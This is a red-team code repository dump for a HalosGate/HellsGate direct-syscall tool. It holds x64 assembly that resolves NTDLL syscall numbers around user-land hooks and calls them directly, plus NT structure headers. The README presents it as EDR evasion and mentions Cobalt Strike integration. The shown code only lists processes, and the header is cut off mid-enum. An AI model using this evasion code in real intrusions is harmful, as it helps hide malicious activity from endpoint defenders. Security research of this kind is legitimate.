[ { "path": "LICENSE.md", "content": "MIT License\n\nCopyright (c) 2023 Bobby Cooke\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# ASM HalosGate Direct System Caller\nAssembly HalosGate implementation that directly calls Windows System Calls, evades EDR User Land hooks, and displays the PPID of the explorer.exe process.\n\n![](/imgs/asmHalosGatePoc.png)\n+ In this screenshot the \"NtQuerySystemInformation\" & \"NtAllocateVirtualMemory\" NTDLL.DLL APIs systemcalls are discovered by using the HalosGate technique after failing to retrieve them via HellsGate technique due to EDR UserLand hooks.\n+ After the systemcalls are resolved via the HellsGate and HalosGate method, they are are called directly. The code in NTDLL is never executed.\n\n### To Do List\n+ Obfuscate the strings for that are used for resolving the addresses of the NTDLL symbols\n + Or use hashing\n+ ~Need to fix some bugs when switching from debug to release mode in visual studio's~ (Fixed 05/08/21)\n+ ~Need to figure out how to properly overload the call to HellDescent()~ (Fixed 05/08/21)\n+ Clean up the assembly functions, they are messy and could be better (Some cleanup 05/08/21)\n+ ~Do better checking for the process image name so it doesnt conflict with other processes named explorer~ (Fixed 05/08/21)\n+ Better error handling (Some better handling 05/08/21)\n+ ~Make this into a cobalt strike beacon object file~ ( Complete! 06/08/21)\n + See [HalosGate Processlist Cobalt Strike BOF\n](https://github.com/boku7/halosgate-ps) project! ;)\n+ Build on this project for process injection / syscall PS \n+ ~Use halos gate to handle EDR hooks.~ (Implemented in this project on 05/08/21)\n\n### Credits / References\n+ Reenz0h from @SEKTOR7net (Creator of the HalosGate technique )\n + This HalosGate project is based on the work of Reenz0h.\n + Most of the C techniques I use are from Reenz0h's awesome courses and blogs \n + Best classes for malware development out there.\n + Creator of the halos gate technique. His work was the motivation for this work.\n + https://blog.sektor7.net/#!res/2021/halosgate.md \n + https://institute.sektor7.net/\n+ @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique )\n + Could not have made my implementation of HellsGate without them :)\n + Awesome work on this method, really enjoyed working through it myself. Thank you!\n + https://github.com/am0nsec/HellsGate \n + Link to the Hell's Gate paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf\n+ Pavel Yosifovich (@zodiacon)\n + I learned how to correctly call NtQuerySystemInformation from Pavel's class on pentester academy. Full credits to Pavel for this. (BTW Pavel is an awesome teacher and I 100% recommend).\n + [Windows Process Injection for Red-Blue Teams - Module 2: NTQuerySystemInformation](https://www.pentesteracademy.com/video?id=1634)\n" }, { "path": "bcookesHalosGate.asm", "content": "; Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/\r\n; Credits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique)\r\n\r\n.code \r\n\r\ngetntdll PROC\r\n\txor rdi, rdi ; RDI = 0x0\r\n\tmul rdi ; RAX&RDX =0x0\r\n\tmov rbx, gs:[rax+60h] ; RBX = Address_of_PEB\r\n\tmov rbx, [rbx+18h] ; RBX = Address_of_LDR\r\n\tmov rbx, [rbx+20h] ; \r\n\tmov rbx, [rbx] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll\r\n\tmov rbx, [rbx+20h] ; RBX = &ntdll.dll ( Base Address of ntdll.dll)\r\n\tmov rax, rbx ; RBX & RAX = &ntdll.dll\r\n\tret ; return to caller\r\ngetntdll ENDP\r\n\r\n; Get ExportTable Address of supplied module DLL\r\ngetExportTable PROC\r\n\tmov rbx, rcx ; RBX = Supplied Module Address\r\n\tmov r8, rcx ; R8 = Supplied Module Address\r\n\tmov ebx, [rbx+3Ch] ; RBX = Offset NewEXEHeader\r\n\tadd rbx, r8 ; RBX = &ntdll.dll + Offset NewEXEHeader = &NewEXEHeader\r\n\txor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add\r\n\tadd cx, 88ffh\r\n\tshr rcx, 8h ; RCX = 0x88ff --> 0x88\r\n\tmov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable\r\n\tadd rdx, r8 ; RDX = &ntdll.dll + RVA ExportTable = &ExportTable\r\n\tmov rax, rdx ; RAX = &module.ExportTable\r\n\tret ; return to caller\r\ngetExportTable ENDP\r\n\r\n; Get &module.ExportTable.AddressTable from &module.ExportTable\r\ngetExAddressTable PROC\r\n\tmov r8, rdx ; R8 = &module.dll\r\n\tmov rdx, rcx ; RDX = &module.ExportTable\r\n\txor r10, r10\r\n\tmov r10d, [rdx+1Ch] ; RDI = RVA AddressTable\r\n\tadd r10, r8 ; R10 = &AddressTable\r\n\tmov rax, r10 ; RAX = &module.ExportTable.AddressTable\r\n\tret ; return to caller\r\ngetExAddressTable ENDP\r\n\r\n; Get &module.NamePointerTable from &module.ExportTable\r\ngetExNamePointerTable PROC\r\n\tmov r8, rdx ; R8 = &module.dll\r\n\tmov rdx, rcx ; RDX = &module.ExportTable\r\n\txor r11, r11\r\n\tmov r11d, [rdx+20h] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable\r\n\tadd r11, r8 ; R11 = &NamePointerTable (Memory Address of module Export NamePointerTable)\r\n\tmov rax, r11 ; RAX = &module.ExportTable.NamePointerTable\r\n\tret ; return to caller\r\ngetExNamePointerTable ENDP\r\n\r\n; Get &OrdinalTable from ntdll.dll ExportTable\r\ngetExOrdinalTable PROC\r\n\tmov r8, rdx ; R8 = &module.dll\r\n\tmov rdx, rcx ; RDX = &module.ExportTable\r\n\txor r12, r12\r\n\tmov r12d, [rdx+24h] ; R12 = RVA OrdinalTable\r\n\tadd r12, r8 ; R12 = &OrdinalTable\r\n\tmov rax, r12 ; RAX = &module.ExportTable.OrdinalTable\r\n\tret ; return to caller\r\ngetExOrdinalTable ENDP\r\n\r\n; Get the address of the API from the module ExportTable\r\n; IN: &Module.ExportTable.NamePointerTable + &Module\r\ngetApiAddr PROC\r\n\tmov r10, r9 ; R10 = &module.ExportTable.AddressTable\r\n\tmov r11, [rsp+28h] ; R11 = &module.ExportTable.NamePointerTable\r\n\tmov r12, [rsp+30h] ; R12 = &module.ExportTable.OrdinalTable\r\n\txor rax, rax ; Setup Counter for resolving the API Address after finding the name string\r\n\tpush rcx ; push the string length counter to stack\r\n\tjmp short getApiAddrLoop\r\ngetApiAddr ENDP\r\n\r\ngetApiAddrLoop PROC\r\n\tmov rcx, [rsp] ; reset the string length counter from the stack\r\n\txor rdi, rdi ; Clear RDI for setting up string name retrieval\r\n\tmov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]\r\n\tadd rdi, r8 ; RDI = &NameString = RVA NameString + &module.dll\r\n\tmov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)\r\n\trepe cmpsb ; Compare strings at RDI & RSI\r\n\tje getApiAddrFin ; If match then we found the API string. Now we need to find the Address of the API\r\n\tinc rax\r\n\tjmp short getApiAddrLoop\r\ngetApiAddrLoop ENDP\r\n\r\n; Find the address of GetProcAddress by using the last value of the Counter\r\ngetApiAddrFin PROC\r\n\tpop rcx ; remove string length counter from top of stack\r\n\tmov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of module.\r\n\tmov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]\r\n\tadd rax, r8 ; RAX = module. = RVA module. + module.dll BaseAddress\r\n\tret ; return to API caller\r\ngetApiAddrFin ENDP\r\n\r\n; Find the syscall number for the NTDLL API with provided API address\r\n; RCX = NTDLL. Address\r\nfindSyscallNumber PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\tmov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub (mov r10,rcx;mov eax,)\r\n\tcmp rsi, rdi\r\n\tjne error ; if the bytes dont match then its prob hooked. Exit gracefully\r\n\txor rax,rax ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4] ; The systemcall number\r\n\tret ; return to caller\r\nfindSyscallNumber ENDP\r\n\r\n; RCX = &NTDLL. | RDX = 32bytes * Up Increment \r\nhalosGateUp PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\txor rax, rax\r\n\tmov al, 20h ; 32 * Increment = Syscall Up\r\n\tmul dx ; RAX = RAX * RDX = 32 * Syscall Up\r\n\tadd rcx, rax ; RCX = NTDLL.API +- Syscall Stub\r\n\tmov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Up by HalosGate (mov r10, rcx; mov eax, )\r\n\tcmp rsi, rdi\r\n\tjne error ; if the bytes dont match then its prob hooked. Exit gracefully\r\n\txor rax,rax ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4] ; The systemcall number for the API close to the target\r\n\tret ; return to caller\r\nhalosGateUp ENDP\r\n\r\n; RCX = &NTDLL. | RDX = 32bytes * Down Increment \r\nhalosGateDown PROC\r\n\txor rsi, rsi\r\n\txor rdi, rdi \r\n\tmov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX\r\n\txor rax, rax\r\n\tmov al, 20h ; 32 * Increment = Syscall Down\r\n\tmul dx ; RAX = RAX * RDX = 32 * Syscall Down\r\n\tsub rcx, rax ; RCX = NTDLL.API - Syscall Stub\r\n\tmov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Down by HalosGate (mov r10, rcx; mov eax, )\r\n\tcmp rsi, rdi\r\n\tjne error ; if the bytes dont match then its prob hooked. Exit gracefully\r\n\txor rax,rax ; clear RAX as it will hold the syscall\r\n\tmov ax, [rcx+4] ; The systemcall number for the API close to the target\r\n\tret ; return to caller\r\nhalosGateDown ENDP\r\n\r\nerror PROC\r\n\txor rax, rax ; return 0 for error\r\n\tret ; return to caller\r\nerror ENDP\r\n\r\nHellsGate PROC\r\n\txor r11, r11\r\n\tmov r11d, ecx\r\n\tret\r\nHellsGate ENDP\r\n\r\nHellDescent PROC\r\n\txor rax, rax\r\n\tmov r10, rcx\r\n\tmov eax, r11d\r\n\tsyscall\r\n\tret\r\nHellDescent ENDP\r\n\r\ncompExplorer PROC\r\n\txor rsi, rsi\r\n\tcmp rsi, rcx\r\n\tje error ; This is a null entry, skip this one\r\n\tmov rsi, 6c007000780065h ; unicode \"expl\"\r\n\tmov rdx, [rcx] ; move the first 4 characters of the string into RCX register\r\n\tcmp rsi, rdx\r\n\tjne error ; if the bytes dont its match not \"expl\", try the next one\r\n\tmov rsi, 7200650072006fh ; 6f 00 72 00 65 00 72 00 o.r.e.r.\r\n\tmov rdx, [rcx+8h] ; move the next 4 characters of the string into RCX register \"orer\"\r\n\tcmp rsi, rdx\r\n\tjne error ; if the bytes dont match its not \"explorer\", try the next one\r\n\tmov rsi, 6500780065002eh ; 2e 00 65 00 78 00 65 00 ..e.x.e.\r\n\tmov rdx, [rcx+10h] ; move the next 4 characters of the string into RCX register \".exe\"\r\n\tcmp rsi, rdx\r\n\tjne error ; if the bytes dont match its not \"explorer.exe\", try the next one\r\n\tmov rax, 1h ; found \"explorer.exe\" return true\r\n\tret\r\ncompExplorer ENDP\r\n\r\nend\r\n" }, { "path": "bcookesHalosGate.h", "content": "#define RTL_MAX_DRIVE_LETTERS 32\r\n\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * PPS_ATTRIBUTE;\r\n\r\n#define STATUS_BUFFER_TOO_SMALL 0xC0000004\r\n\r\ntypedef struct _RTL_DRIVE_LETTER_CURDIR {\r\n\tUSHORT Flags;\r\n\tUSHORT Length;\r\n\tULONG TimeStamp;\r\n\tUNICODE_STRING DosPath;\r\n} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;\r\n\r\ntypedef struct _CURDIR\r\n{\r\n\tUNICODE_STRING DosPath;\r\n\tPVOID Handle;\r\n} CURDIR, * PCURDIR;\r\n\r\n\r\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\r\n{\r\n\tULONG MaximumLength;\r\n\tULONG Length;\r\n\r\n\tULONG Flags;\r\n\tULONG DebugFlags;\r\n\r\n\tHANDLE ConsoleHandle;\r\n\tULONG ConsoleFlags;\r\n\tHANDLE StandardInput;\r\n\tHANDLE StandardOutput;\r\n\tHANDLE StandardError;\r\n\r\n\tCURDIR CurrentDirectory;\r\n\tUNICODE_STRING DllPath;\r\n\tUNICODE_STRING ImagePathName;\r\n\tUNICODE_STRING CommandLine;\r\n\tPVOID Environment;\r\n\r\n\tULONG StartingX;\r\n\tULONG StartingY;\r\n\tULONG CountX;\r\n\tULONG CountY;\r\n\tULONG CountCharsX;\r\n\tULONG CountCharsY;\r\n\tULONG FillAttribute;\r\n\r\n\tULONG WindowFlags;\r\n\tULONG ShowWindowFlags;\r\n\tUNICODE_STRING WindowTitle;\r\n\tUNICODE_STRING DesktopInfo;\r\n\tUNICODE_STRING ShellInfo;\r\n\tUNICODE_STRING RuntimeData;\r\n\tRTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\r\n\r\n\tULONG EnvironmentSize;\r\n\tULONG EnvironmentVersion;\r\n\tPVOID PackageDependencyData;\r\n\tULONG ProcessGroupId;\r\n\tULONG LoaderThreads;\r\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\r\n\r\ntypedef enum _PS_CREATE_STATE\r\n{\r\n\tPsCreateInitialState,\r\n\tPsCreateFailOnFileOpen,\r\n\tPsCreateFailOnSectionCreate,\r\n\tPsCreateFailExeFormat,\r\n\tPsCreateFailMachineMismatch,\r\n\tPsCreateFailExeName,\r\n\tPsCreateSuccess,\r\n\tPsCreateMaximumStates\r\n} PS_CREATE_STATE, * PPS_CREATE_STATE;\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG Length;\r\n\tHANDLE RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG Attributes;\r\n\tPVOID SecurityDescriptor;\r\n\tPVOID SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef struct _PS_CREATE_INFO\r\n{\r\n\tSIZE_T Size;\r\n\tPS_CREATE_STATE State;\r\n\tunion\r\n\t{\r\n\t\t// PsCreateInitialState\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG InitFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR WriteOutputOnExit : 1;\r\n\t\t\t\t\tUCHAR DetectManifest : 1;\r\n\t\t\t\t\tUCHAR IFEOSkipDebugger : 1;\r\n\t\t\t\t\tUCHAR IFEODoNotPropagateKeyState : 1;\r\n\t\t\t\t\tUCHAR SpareBits1 : 4;\r\n\t\t\t\t\tUCHAR SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT ProhibitedImageCharacteristics : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tACCESS_MASK AdditionalFileAccess;\r\n\t\t} InitState;\r\n\t\t// PsCreateFailOnSectionCreate\r\n\t\tstruct {\r\n\t\t\tHANDLE FileHandle;\r\n\t\t} FailSection;\r\n\t\t// PsCreateFailExeFormat\r\n\t\tstruct {\r\n\t\t\tUSHORT DllCharacteristics;\r\n\t\t} ExeFormat;\r\n\t\t// PsCreateFailExeName\r\n\t\tstruct {\r\n\t\t\tHANDLE IFEOKey;\r\n\t\t} ExeName;\r\n\t\t// PsCreateSuccess\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tULONG OutputFlags;\r\n\t\t\t\tstruct {\r\n\t\t\t\t\tUCHAR ProtectedProcess : 1;\r\n\t\t\t\t\tUCHAR AddressSpaceOverride : 1;\r\n\t\t\t\t\tUCHAR DevOverrideEnabled : 1; // from Image File Execution Options\r\n\t\t\t\t\tUCHAR ManifestDetected : 1;\r\n\t\t\t\t\tUCHAR ProtectedProcessLight : 1;\r\n\t\t\t\t\tUCHAR SpareBits1 : 3;\r\n\t\t\t\t\tUCHAR SpareBits2 : 8;\r\n\t\t\t\t\tUSHORT SpareBits3 : 16;\r\n\t\t\t\t};\r\n\t\t\t};\r\n\t\t\tHANDLE FileHandle;\r\n\t\t\tHANDLE SectionHandle;\r\n\t\t\tULONGLONG UserProcessParametersNative;\r\n\t\t\tULONG UserProcessParametersWow64;\r\n\t\t\tULONG CurrentParameterFlags;\r\n\t\t\tULONGLONG PebAddressNative;\r\n\t\t\tULONG PebAddressWow64;\r\n\t\t\tULONGLONG ManifestAddress;\r\n\t\t\tULONG ManifestSize;\r\n\t\t} SuccessState;\r\n\t};\r\n} PS_CREATE_INFO, * PPS_CREATE_INFO;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\n\r\ntypedef enum _KWAIT_REASON\r\n{\r\n\tExecutive = 0,\r\n\tFreePage = 1,\r\n\tPageIn = 2,\r\n\tPoolAllocation = 3,\r\n\tDelayExecution = 4,\r\n\tSuspended = 5,\r\n\tUserRequest = 6,\r\n\tWrExecutive = 7,\r\n\tWrFreePage = 8,\r\n\tWrPageIn = 9,\r\n\tWrPoolAllocation = 10,\r\n\tWrDelayExecution = 11,\r\n\tWrSuspended = 12,\r\n\tWrUserRequest = 13,\r\n\tWrEventPair = 14,\r\n\tWrQueue = 15,\r\n\tWrLpcReceive = 16,\r\n\tWrLpcReply = 17,\r\n\tWrVirtualMemory = 18,\r\n\tWrPageOut = 19,\r\n\tWrRendezvous = 20,\r\n\tSpare2 = 21,\r\n\tSpare3 = 22,\r\n\tSpare4 = 23,\r\n\tSpare5 = 24,\r\n\tWrCalloutStack = 25,\r\n\tWrKernel = 26,\r\n\tWrResource = 27,\r\n\tWrPushLock = 28,\r\n\tWrMutex = 29,\r\n\tWrQuantumEnd = 30,\r\n\tWrDispatchInt = 31,\r\n\tWrPreempted = 32,\r\n\tWrYieldExecution = 33,\r\n\tWrFastMutex = 34,\r\n\tWrGuardedMutex = 35,\r\n\tWrRundown = 36,\r\n\tMaximumWaitReason = 37\r\n} KWAIT_REASON;\r\n\r\ntypedef LONG KPRIORITY;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * PCLIENT_ID;\r\n\r\ntypedef struct _SYSTEM_THREAD_INFORMATION\r\n{\r\n\tLARGE_INTEGER KernelTime;\r\n\tLARGE_INTEGER UserTime;\r\n\tLARGE_INTEGER CreateTime;\r\n\tULONG WaitTime;\r\n\tPVOID StartAddress;\r\n\tCLIENT_ID ClientId;\r\n\tKPRIORITY Priority;\r\n\tLONG BasePriority;\r\n\tULONG ContextSwitches;\r\n\tULONG ThreadState;\r\n\tKWAIT_REASON WaitReason;\r\n} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;\r\n\r\n\r\ntypedef struct _SYSTEM_PROCESS_INFORMATION\r\n{\r\n\tULONG NextEntryOffset;\r\n\tULONG NumberOfThreads;\r\n\tLARGE_INTEGER WorkingSetPrivateSize; // since VISTA\r\n\tULONG HardFaultCount; // since WIN7\r\n\tULONG NumberOfThreadsHighWatermark; // since WIN7\r\n\tULONGLONG CycleTime; // since WIN7\r\n\tLARGE_INTEGER CreateTime;\r\n\tLARGE_INTEGER UserTime;\r\n\tLARGE_INTEGER KernelTime;\r\n\tUNICODE_STRING ImageName;\r\n\tKPRIORITY BasePriority;\r\n\tHANDLE UniqueProcessId;\r\n\tHANDLE InheritedFromUniqueProcessId;\r\n\tULONG HandleCount;\r\n\tULONG SessionId;\r\n\tULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation)\r\n\tSIZE_T PeakVirtualSize;\r\n\tSIZE_T VirtualSize;\r\n\tULONG PageFaultCount;\r\n\tSIZE_T PeakWorkingSetSize;\r\n\tSIZE_T WorkingSetSize;\r\n\tSIZE_T QuotaPeakPagedPoolUsage;\r\n\tSIZE_T QuotaPagedPoolUsage;\r\n\tSIZE_T QuotaPeakNonPagedPoolUsage;\r\n\tSIZE_T QuotaNonPagedPoolUsage;\r\n\tSIZE_T PagefileUsage;\r\n\tSIZE_T PeakPagefileUsage;\r\n\tSIZE_T PrivatePageCount;\r\n\tLARGE_INTEGER ReadOperationCount;\r\n\tLARGE_INTEGER WriteOperationCount;\r\n\tLARGE_INTEGER OtherOperationCount;\r\n\tLARGE_INTEGER ReadTransferCount;\r\n\tLARGE_INTEGER WriteTransferCount;\r\n\tLARGE_INTEGER OtherTransferCount;\r\n\tSYSTEM_THREAD_INFORMATION Threads[1];\r\n} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;\r\n\r\n// source:http://www.microsoft.com/whdc/system/Sysinternals/MoreThan64proc.mspx\r\n// https://processhacker.sourceforge.io/doc/ntexapi_8h_source.html#l01202\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION\r\n\tSystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION\r\n\tSystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION\r\n\tSystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION\r\n\tSystemPathInformation, // not implemented\r\n\tSystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION\r\n\tSystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION\r\n\tSystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION\r\n\tSystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION\r\n\tSystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION\r\n\tSystemCallTimeInformation, // 10, not implemented\r\n\tSystemModuleInformation, // q: RTL_PROCESS_MODULES\r\n\tSystemLocksInformation,\r\n\tSystemStackTraceInformation,\r\n\tSystemPagedPoolInformation, // not implemented\r\n\tSystemNonPagedPoolInformation, // not implemented\r\n\tSystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION\r\n\tSystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION\r\n\tSystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION\r\n\tSystemVdmInstemulInformation, // q\r\n\tSystemVdmBopInformation, // 20, not implemented\r\n\tSystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)\r\n\tSystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION\r\n\tSystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION\r\n\tSystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)\r\n\tSystemFullMemoryInformation, // not implemented\r\n\tSystemLoadGdiDriverInformation, // s (kernel-mode only)\r\n\tSystemUnloadGdiDriverInformation, // s (kernel-mode only)\r\n\tSystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)\r\n\tSystemSummaryMemoryInformation, // not implemented\r\n\tSystemMirrorMemoryInformation, // 30, s (requires license value \"Kernel-MemoryMirroringSupported\") (requires SeShutdownPrivilege)\r\n\tSystemPerformanceTraceInformation, // s\r\n\tSystemObsolete0, // not implemented\r\n\tSystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION\r\n\tSystemCrashDumpStateInformation, // s (requires SeDebugPrivilege)\r\n\tSystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION\r\n\tSystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION\r\n\tSystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)\r\n\tSystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only\r\n\tSystemPrioritySeperation, // s (requires SeTcbPrivilege)\r\n\tSystemVerifierAddDriverInformation, // 40, s (requires SeDebugPrivilege)\r\n\tSystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)\r\n\tSystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION\r\n\tSystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION\r\n\tSystemCurrentTimeZoneInformation, // q\r\n\tSystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION\r\n\tSystemTimeSlipNotification, // s (requires SeSystemtimePrivilege)\r\n\tSystemSessionCreate, // not implemented\r\n\tSystemSessionDetach, // not implemented\r\n\tSystemSessionInformation, // not implemented\r\n\tSystemRangeStartInformation, // 50, q\r\n\tSystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)\r\n\tSystemVerifierThunkExtend, // s (kernel-mode only)\r\n\tSystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION\r\n\tSystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation)\r\n\tSystemNumaProcessorMap, // q\r\n\tSystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation\r\n\tSystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION\r\n\tSystemRecommendedSharedDataAlignment, // q\r\n\tSystemComPlusPackage, // q; s\r\n\tSystemNumaAvailableMemory, // 60\r\n\tSystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION\r\n\tSystemEmulationBasicInformation, // q\r\n\tSystemEmulationProcessorInformation,\r\n\tSystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX\r\n\tSystemLostDelayedWriteInformation, // q: ULONG\r\n\tSystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION\r\n\tSystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION\r\n\tSystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION\r\n\tSystemHotpatchInformation, // q; s\r\n\tSystemObjectSecurityMode, // 70, q\r\n\tSystemWatchdogTimerHandler, // s (kernel-mode only)\r\n\tSystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only)\r\n\tSystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION\r\n\tSystemWow64SharedInformationObsolete, // not implemented\r\n\tSystemRegisterFirmwareTableInformationHandler, // s (kernel-mode only)\r\n\tSystemFirmwareTableInformation, // not implemented\r\n\tSystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX\r\n\tSystemVerifierTriageInformation, // not implemented\r\n\tSystemSuperfetchInformation, // q: SUPERFETCH_INFORMATION; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation\r\n\tSystemMemoryListInformation, // 80, q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege)\r\n\tSystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)\r\n\tSystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)\r\n\tSystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[]\r\n\tSystemVerifierCancellationInformation, // not implemented // name:wow64:whNT32QuerySystemVerifierCancellationInformation\r\n\tSystemProcessorPowerInformationEx, // not implemented\r\n\tSystemRefTraceInformation, // q; s // 